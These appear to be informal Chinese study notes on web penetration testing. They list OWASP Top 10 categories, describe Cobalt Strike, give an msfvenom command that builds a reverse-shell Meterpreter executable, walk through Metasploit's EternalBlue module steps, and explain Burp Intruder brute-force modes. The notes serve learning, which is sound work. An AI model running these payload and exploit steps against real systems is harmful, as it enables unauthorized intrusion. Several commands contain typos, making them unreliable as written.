1. 常见的网站漏洞
OWASP TOP 10:每年公布关于web安全的十大安全威胁报告,三年公开一次
- SQL注入(key):渗透数据库,获取数据库数据或者控制权限
- XSS
- 文件上传(key):上传木马病毒到网站中
- 反序列化
- 文件包含
- CSRF
- 命令执行(key):获取命令执行的权限
- 信息泄露
- XXE
- SSRF
- 未授权访问
OWASP TOP 10:每年公布关于web安全的十大安全威胁报告,三年公开一次
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。服务端是一个,客户端可以有多个,团队可进行分布式协团操作。,使用之前要自己先配置好java的环境。
msfvenom -p(payload,负载选项) windows/x64/merterpreter/reverse_tcp lhost = 本机IP lport = 本机端口(随便)-f(生成什么形式的文件) exe -o(输出) demo.exe
打开kali进root权限
命令行msfconsole(msf工具的一个接口)
search ms17_010(找永恒之蓝漏洞)
ues: use 0
set: 设置相关参数,源Ip(默认配好的),目标靶机ip、端口号(默认就行)
run
完成
一般用于服务器端,本机客户端有些命令不存在
单字典(只有一个字典)
1.Sniper:按顺序一个一个参数依次遍历,一个参数遍历完,然后恢复成原数据,再遍历下一个参数。
2.Battering ram:每个参数同时遍历同一个字典。但是这种爆破在实际过程中是很不合理的,应为基本不会有人将用户名和密码设置成一样的,就像大多数人不会将qq密码设置成qq号一样。
一个相当于单挑,一个相当于群殴。